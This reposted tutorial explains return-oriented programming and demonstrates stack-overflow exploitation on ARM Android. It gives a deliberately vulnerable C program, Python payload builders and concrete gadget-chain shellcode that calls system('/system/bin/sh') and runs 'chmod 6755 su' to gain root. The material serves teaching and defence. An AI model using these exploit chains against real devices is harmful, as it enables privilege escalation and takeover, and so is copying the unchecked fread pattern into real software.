Introduction
ROP stands for return-oriented programming. The core idea is to find suitable instruction fragments (gadgets) inside the functions that already exist in the process's address space, and to chain those gadgets together through a carefully crafted return stack in order to carry out an attack. The hard part of building a ROP attack is that we have to search the entire process space for the gadgets we need, which can take a considerable amount of time. But once the searching and stitching are done, the attack is very hard to stop: it runs only legitimate code that is already in memory, so an ordinary antivirus engine has almost no way to detect it.
Stack overflow vulnerability and stack overflow attack
Before introducing how ROP works, we first need to introduce the stack overflow vulnerability.
Stack overflow (stack-based buffer overflow) is a common vulnerability in the security field. On the one hand, programmers carelessly use unsafe functions such as strcpy and sprintf, which makes stack overflows more likely. On the other hand, the stack stores control information such as function return addresses, so an attacker who can overwrite data on the stack can usually redirect the program's execution and cause much greater damage. This kind of attack is called a stack smashing attack.
Stack overflow attacks are possible because the program lacks bounds checking, and because buffer operations (such as copying a string) write from low addresses toward high addresses while the return address of the function call always sits above the buffer on the current stack. Together these give us the conditions needed to overwrite the return address.
Here is a demo with a stack overflow:
#include <stdio.h>
#include <string.h>

int bof(FILE *badfile) {
    char buffer[20];
    /* Reads up to 100 bytes into a 20-byte buffer: this is the overflow. */
    fread(buffer, sizeof(char), 100, badfile);
    return 1;
}

int main() {
    FILE *badfile;
    badfile = fopen("badfile", "r");
    bof(badfile);
    printf("returned properly\n");
    fclose(badfile);
    return 0;
}
The demo simply reads up to 100 bytes from the file badfile, but buffer is only 20 bytes long, so a stack overflow can occur.
Here is the assembly generated when compiling under Cygwin (I have removed some details that are irrelevant to understanding the logic):
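_main:
    pushl %ebp
    movl %esp, %ebp
    andl $-16, %esp
    subl $32, %esp
    call ___main
    movl $LC0, 4(%esp)          # second argument of fopen: mode
    movl $LC1, (%esp)           # first argument of fopen: file name
    call _fopen
    movl %eax, 28(%esp)         # save the result in the local badfile
    movl 28(%esp), %eax
    movl %eax, (%esp)           # argument of bof: badfile
    call _bof
    movl $LC2, (%esp)
    call _puts
    movl 28(%esp), %eax
    movl %eax, (%esp)
    call _fclose
    movl $0, %eax
    leave
    ret
_bof:
    pushl %ebp
    movl %esp, %ebp
    subl $56, %esp
    movl 8(%ebp), %eax
    movl %eax, 12(%esp)         # fourth argument of fread: badfile
    movl $100, 8(%esp)          # third argument: count
    movl $1, 4(%esp)            # second argument: sizeof(char)
    leal -28(%ebp), %eax
    movl %eax, (%esp)           # first argument: buffer, at ebp-28
    call _fread
    movl $1, %eax
    leave
    ret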
We focus only on the transfer from main into bof, and on the return to main after bof finishes.
- Starting from call _fopen, the badfile address is already on the stack before _bof is entered.
- The call _bof instruction pushes the address of the next instruction (movl $LC2, (%esp)) onto the stack; this is the return address used once _bof finishes.
- On entering _bof, the first step is to push EBP. EBP holds the caller's stack base and is used later to restore ESP.
The memory layout of the entire stack is as follows:
From the layout you can see that the space actually allocated to buffer is 28 bytes, followed by the saved EBP (the old stack base), the return address of bof, and the badfile address. So when badfile holds no more than 28 bytes, the program still runs normally. When it holds more than 28 bytes, the saved EBP and the return address are overwritten directly, which is how the return address gets modified.
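To make the layout concrete, here is a minimal Python sketch that models the bof frame as a byte array and reports which saved values a given badfile would overwrite. The 28-byte distance comes from the disassembly (leal -28(%ebp)); the saved EBP and return address values, and the name simulate_bof, are made up for illustration.

```python
import struct

# Distance from the start of buffer to the saved EBP, per "leal -28(%ebp)".
BUFFER_TO_SAVED_EBP = 28


def simulate_bof(file_data, saved_ebp=0xBFFFF000, ret_addr=0x00401234, max_read=100):
    """Model fread() into the bof frame.

    Returns (saved_ebp, ret_addr) as they look after the copy.
    The default saved_ebp and ret_addr are hypothetical values.
    """
    # Frame image: buffer area, then saved EBP, then the return address.
    frame = bytearray(BUFFER_TO_SAVED_EBP) + struct.pack("<II", saved_ebp, ret_addr)
    frame += bytes(max_read)  # room for the rest of the caller's stack
    data = file_data[:max_read]  # fread copies at most max_read bytes
    frame[:len(data)] = data  # no bounds check against the 20-byte buffer
    return struct.unpack_from("<II", frame, BUFFER_TO_SAVED_EBP)
```

With 28 bytes of input the two saved values come back unchanged; appending eight more bytes replaces both of them with attacker-chosen words.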
The predecessors of ROP
Now that you have an intuitive understanding of stack smashing attacks, let's look at how ROP evolved.
Stack smashing attacks
This was the earliest form of stack overflow attack, and it has been analyzed in detail above.
Stack smashing is not invincible. Its countermeasures are DEP (Data Execution Prevention) and ASLR (Address Space Layout Randomization); under the protection of these two technologies, stack smashing attacks are held back to some extent.
Return-to-library technique
Abbreviated as "ret2lib", this technique bypasses DEP. The core idea is to point the return address directly at an existing function in the system (typically system, because it is simple to use and takes only one parameter), which is enough to carry out an attack. Going back to the example above, suppose we craft the data in badfile so that, once bof has read it, the return address of bof holds the address of system, the next word holds a fake return address, and the word after that holds the address of the string "/bin/sh".
When bof returns, execution jumps straight into system, which then fetches its first argument, namely &"/bin/sh", so the program directly spawns an sh process. If the program is a SUID root program, this means we can easily gain root privileges.
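As a rough sketch, a ret2lib input for the x86 demo could be built like this in Python. The 28-byte padding follows the frame layout discussed earlier; the function name and every address in the usage line are hypothetical placeholders, not values taken from a real system.

```python
import struct


def ret2lib_payload(system_addr, binsh_addr, pad_len=28,
                    fake_ebp=0x41414141, fake_ret=0x42424242):
    """Build the badfile contents for a 32-bit return-to-library attack.

    Layout after the padding: saved EBP, return address (system),
    the return address system will see, and system's first argument.
    """
    words = [fake_ebp, system_addr, fake_ret, binsh_addr]
    return b"A" * pad_len + struct.pack("<4I", *words)


# Hypothetical addresses, for illustration only.
payload = ret2lib_payload(system_addr=0x0804A010, binsh_addr=0x0804B020)
```

The fake return address sits between system and its argument because system, like any cdecl function, expects its caller's return address at the top of the stack on entry.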
Borrowed code chunks
"ret2lib" worked very well until x64 systems appeared. Compared with x86, the key difference on x64 is that function arguments are no longer passed entirely on the stack: the first argument must be placed in a register (rdi under the System V calling convention used on Linux). Simply placing the argument's address on the stack therefore no longer works, unless the function takes no arguments. This is how the borrowed code chunks technique was born. It is a conceptual breakthrough over ret2lib: the return address no longer has to point at a function's entry, but can point at any instruction fragment inside a function. Returning to the demo, if we want to load the address of "/bin/sh" into rdi, we can look for instructions such as:
pop %rdi
ret
or
pop %rdi
pop %rbx
jmp *%rbx
and so on.
If we find the former sequence, we write the following data into badfile, starting at the saved frame pointer: [fake_rbp][pop_address][&"/bin/sh"][system_address][fake_return_address]. This achieves the same attack.
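A chain of this kind could be packed as follows. This is only a sketch: it assumes 64-bit little-endian words because the technique targets x64, it fills the saved frame pointer slot first because that slot sits just below the return address, and the padding length and all addresses are hypothetical placeholders.

```python
import struct


def p64(value):
    """Pack one 64-bit little-endian stack word."""
    return struct.pack("<Q", value)


def borrowed_chunk_payload(pad_len, pop_gadget, binsh_addr, system_addr,
                           fake_fp=0x4141414141414141,
                           fake_ret=0x4242424242424242):
    """Padding, saved frame pointer, then the chain.

    The overwritten return address points at a "pop argument register;
    ret" gadget, which pops binsh_addr and then returns into system.
    """
    return (b"A" * pad_len
            + p64(fake_fp)
            + p64(pop_gadget)
            + p64(binsh_addr)
            + p64(system_addr)
            + p64(fake_ret))


# Hypothetical values, for illustration only.
payload = borrowed_chunk_payload(16, 0x400100, 0x600200, 0x400300)
```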
Return-oriented programming
Borrowed code chunks ultimately rely on functions in existing link libraries; if the libraries do not provide a suitable function, the technique can do nothing. ROP was developed to fill this gap. Its guiding idea is to assemble the entire attack from instruction sequences found in existing functions. Each such sequence is a logical fragment that can be linked to the next one through a control-transfer instruction (ret on x86; on ARM, a jump or any other instruction that writes the PC), and is called a gadget. In the end, a ROP attack is simply a chain of gadgets.
The power of ROP is that, given one overflow flaw and enough stack space, arbitrary logic can be implemented, and ROP attacks remain a challenge for the major virus scanning engines.
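At its simplest, searching for gadgets means scanning executable bytes for a known instruction encoding. The Python sketch below does this for the two-byte x86 sequence 58 c3 (pop %eax; ret). The function name, the base address, and the sample bytes are illustrative; real tools also disassemble backwards from each ret to discover longer sequences.

```python
def find_gadgets(code, pattern, base=0):
    """Return the address of every occurrence of pattern in code.

    code    -- raw bytes of an executable region
    pattern -- encoded instruction sequence to look for
    base    -- load address of code[0]
    """
    hits = []
    start = code.find(pattern)
    while start != -1:
        hits.append(base + start)
        # Step one byte at a time: x86 gadgets may start at any offset.
        start = code.find(pattern, start + 1)
    return hits


# Sample bytes: nop; pop %eax; ret; nop; nop; pop %eax; ret
blob = b"\x90\x58\xc3\x90\x90\x58\xc3"
gadgets = find_gadgets(blob, b"\x58\xc3", base=0x1000)
```

Stepping by a single byte matters on x86, where instructions are not aligned and a useful sequence can begin in the middle of another instruction.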
Feasibility of ROP on ARM
Although x86 (x64) and ARM differ in their procedure call standard (PCS) and in their instruction format, the idea behind ROP applies on ARM as well. Here is a comparison of the two platforms:
The registers also play different roles:
- R15 is the PC (program counter), corresponding to EIP on x86
- R14 is the LR (link register), which has no counterpart on x86
- R13 is the SP (stack pointer), corresponding to ESP on x86
- R11 (R7 in Thumb mode) is the FP (frame pointer), corresponding to EBP on x86
- R4–R10 and R12 are used for local variables
- R0–R3 hold the first four arguments of a function; any further arguments go on the stack. This is the biggest difference from x86
- R0 holds the function's return value, just as EAX does on x86
- The PC on ARM can be written directly, which makes ROP attacks easier to some extent
Implementing ROP attacks on Android
Most Android phones on the market are based on ARM, so ROP attacks on Android are feasible in theory. Note, however, that the libc on Android is Bionic libc rather than the widely used glibc. Google has hardened it by optimizing away most r0-related instructions, which greatly increases the difficulty of ROP attacks.
Attack Demo
We have covered a lot of theory, so let's move on to some demos.
The following tools are used:
- arm-linux-androideabi (cross compiler for Android)
- IDA 6.1 (for remote debugging on Android)
- Python environment (for building the shellcode)
- ADDP (for quickly looking up the addresses of system functions)
- ADDSP (for quickly verifying that a string address in libc.so is correct)
DEMO1: changing the return address of bof
Let's start with a simple demo that reuses the vulnerable program shown earlier. First, look at its code on ARM:
Here 0x83C4 is the instruction executed after the call to bof returns, whereas 0x83CE is the address we want to jump to. Here is the code of bof:
From the code we can derive the memory layout of its stack, shown below:
According to this layout, the system allocates exactly 20 bytes for buffer, followed by the saved R7 and then LR. We first note the saved R7 value, which is 0xbefffa70 on my phone, and we need to change the value of LR to 0x000083CE. So we construct the following shellcode:
'A' * 20 + '\x70\xfa\xff\xbe' + '\xcf\x83\x00\x00' (PS: ARM stores data in little-endian order)
Also note that ARM has both the ARM (32-bit) and Thumb (16-bit) instruction formats, and the processor chooses between them based on bit[0] of the target address: if bit[0] is 1, it switches to Thumb mode; otherwise it executes in ARM mode. Our demo is compiled as Thumb, so the final jump address must be 0x000083cf.
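The DEMO1 input can be generated with a few lines of Python. This is a sketch under stated assumptions: the 20-byte padding is inferred from the buffer size given in the text, the helper names are made up, and the saved R7 value is specific to the author's phone.

```python
import struct


def thumb(addr):
    """Set bit[0] so the processor executes the target in Thumb mode."""
    return addr | 1


def demo1_payload(old_r7=0xBEFFFA70, target=0x000083CE, buf_len=20):
    """Fill buffer, keep the saved R7 intact, then overwrite LR.

    buf_len=20 is an assumption based on the buffer size in the text.
    """
    return (b"A" * buf_len
            + struct.pack("<I", old_r7)          # little-endian saved R7
            + struct.pack("<I", thumb(target)))  # new LR, Thumb bit set


payload = demo1_payload()
```

Writing the saved R7 back unchanged keeps main's frame pointer valid, so the program can continue running after the redirected return.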
DEMO2: executing system("/system/bin/sh")
This demo is a little harder. To implement it we need the base address of libc.so; on my phone it is 0x40025000. With the base address we can compute the following addresses:
system: 0x0001a7e8 + 0x40025000 = 0x4003f7e8
"/system/bin/sh": 0x0003aa7f + 0x40025000 = 0x4005fa7f
We also need a suitable gadget to load R0. I eventually found a fragment of the mallinfo function that meets this requirement; see the mallinfo instructions:
Look at the two instructions at 0x16f72 and 0x16f70. We first jump to 0x16f72 (pop {r4, pc}), which loads the address of "/system/bin/sh" into R4 and gives us control of the PC. We then jump to 0x16f70 (movs r0, r4), which copies that address into R0; the pop {r4, pc} that follows it lets us point the PC at system.
The addresses we care about are:
baseaddr: 0x40025000
mallinfo: 0x00016f68 + 0x40025000 = 0x4003bf68
system: 0x0001a7e8 + 0x40025000 = 0x4003f7e8
&"/system/bin/sh": 0x0003aa7f + 0x40025000 = 0x4005fa7f
movs r0, r4: 0x00016f70 + 0x40025000 = 0x4003bf70
pop {r4, pc}: 0x00016f72 + 0x40025000 = 0x4003bf72
Finally we construct the shellcode as follows (the padding covers the 20-byte buffer and the saved R7, and every code address has bit[0] set for Thumb mode):
'A' * 24 + '\x73\xbf\x03\x40' + '\x7f\xfa\x05\x40' + '\x71\xbf\x03\x40' + 'a' * 4 + '\xe9\xf7\x03\x40'
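The address arithmetic and the chain can be reproduced in Python. This sketch uses the offsets and base address listed above, which are specific to the author's phone; the 24-byte padding (20-byte buffer plus saved R7) is an assumption inferred from the DEMO1 layout, and the helper names are made up.

```python
import struct

LIBC_BASE = 0x40025000      # libc.so base on the author's phone
OFF_SYSTEM = 0x0001A7E8     # system
OFF_BINSH = 0x0003AA7F      # "/system/bin/sh" string
OFF_MOVS_R0_R4 = 0x00016F70 # movs r0, r4 (followed by pop {r4, pc})
OFF_POP_R4_PC = 0x00016F72  # pop {r4, pc}


def rebase(offset, thumb=False):
    """Turn a libc.so offset into a runtime address.

    Code addresses get bit[0] set so they execute in Thumb mode;
    data addresses (the string) are left as they are.
    """
    return LIBC_BASE + offset + (1 if thumb else 0)


def demo2_payload(pad_len=24):
    """pad_len=24 is an assumption: 20-byte buffer plus saved R7."""
    chain = [
        rebase(OFF_POP_R4_PC, thumb=True),   # LR: pop {r4, pc}
        rebase(OFF_BINSH),                   # popped into R4
        rebase(OFF_MOVS_R0_R4, thumb=True),  # PC: movs r0, r4; pop {r4, pc}
        0x61616161,                          # filler popped into R4
        rebase(OFF_SYSTEM, thumb=True),      # PC: system
    ]
    return b"A" * pad_len + struct.pack("<5I", *chain)


payload = demo2_payload()
```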
DEMO3: executing an arbitrary script
DEMO2 can only run "/system/bin/sh", which is often not exploitable because we cannot communicate with the target process. We would usually rather have the target process, running as root, execute a privilege-escalation script directly. So in this demo we execute an arbitrary script.
We use "chmod 6755 su" as the test script.
The first idea that comes to mind is to write the script into buffer and then, building on DEMO2, point R0 at the address of buffer. This does not work in practice, because the system function itself also needs stack space, as the following code shows:
system requests 32 bytes of stack space of its own, so with the DEMO2 approach the script written into buffer may be overwritten, as follows:
This leaves room for a script of only 7 bytes in buffer, which is clearly far too little. So we need another way to move SP to a higher address, by looking for instructions similar to the following:
add sp, sp, #N
pop {r7, pc}
Sequences like this can be found almost everywhere; see the final instructions of bof:
We first point the PC at add sp, sp, #0x20, which moves SP up by 32 bytes and exactly offsets the 32 bytes used by system, as follows:
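The addresses we care about are:
baseaddr: 0x40025000
R0: 0xbefffa54
add sp, sp, #0x20: 0x0000839a
pop {r7, pc}: 0x0000839c
Finally, we construct the following shellcode:
'chmod 6755 su' + '\x00' * 11 + '\x9b\x83\x00\x00' + 'a' * 32 + 'a' * 4 + '\x73\xbf\x03\x40' + '\x54\xfa\xff\xbe' + '\x71\xbf\x03\x40' + 'A' * 4 + '\xe9\xf7\x03\x40'
To make the whole sequence of jumps clearer, here is the gadget chain: bof returns to add sp, sp, #0x20 (0x0000839a), which skips 32 bytes of filler; the pop {r7, pc} after it consumes 4 more bytes and jumps to pop {r4, pc} in mallinfo, which loads the buffer address 0xbefffa54 into R4; movs r0, r4 then copies it into R0, and the pop {r4, pc} that follows finally jumps to system.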
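The same input can be assembled programmatically. In this Python sketch the 24-byte distance from buffer to LR and the 32-byte skip are assumptions inferred from the DEMO1 layout and from the #0x20 operand; the buffer address and the libc addresses are those of the author's phone, and the function name is made up.

```python
import struct


def demo3_payload(script=b"chmod 6755 su", buf_addr=0xBEFFFA54,
                  pad_to_lr=24, skip=0x20):
    """Place a script in buffer and chain gadgets to call system(buffer).

    pad_to_lr and skip are assumptions (see the text above the block).
    """
    if len(script) >= pad_to_lr:
        raise ValueError("script must fit below LR with a NUL terminator")
    head = script.ljust(pad_to_lr, b"\x00")      # script, NUL padded up to LR
    lr = struct.pack("<I", 0x0000839A | 1)       # add sp, sp, #0x20 (Thumb)
    filler = b"a" * skip + b"a" * 4              # skipped bytes, then R7
    chain = struct.pack(
        "<5I",
        0x4003BF73,  # pop {r4, pc}
        buf_addr,    # popped into R4: address of the script
        0x4003BF71,  # movs r0, r4; pop {r4, pc}
        0x61616161,  # filler popped into R4
        0x4003F7E9,  # system
    )
    return head + lr + filler + chain


payload = demo3_payload()
```

The NUL padding doubles as the string terminator, so system sees exactly "chmod 6755 su" when R0 points at the start of buffer.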
Conclusion
- After the demos above, you should have a feel for the power of ROP
- Android malware will inevitably become more and more advanced and move closer and closer to the low-level layers of the system
- Defending against ROP attacks has always been a hard problem for the security community, and there is a good deal of research on how to counter ROP
- Minimize the use of functions that perform no length check, such as strcpy and gets
All the code and tools used in this write-up can be obtained from me.
Related references
- "Return-to-libc Attack Lab", Wenliang Du, Syracuse University
- "ARM Embedded System Architecture and Programming", Tie Qiu
- "Buffer Overflow", Cheng
- "Exploitation on ARM", STRI/Advance Technology Lab/Security
- "ARM Exploitation ROPmap", Long Le
[Repost] An analysis of ROP attacks on Android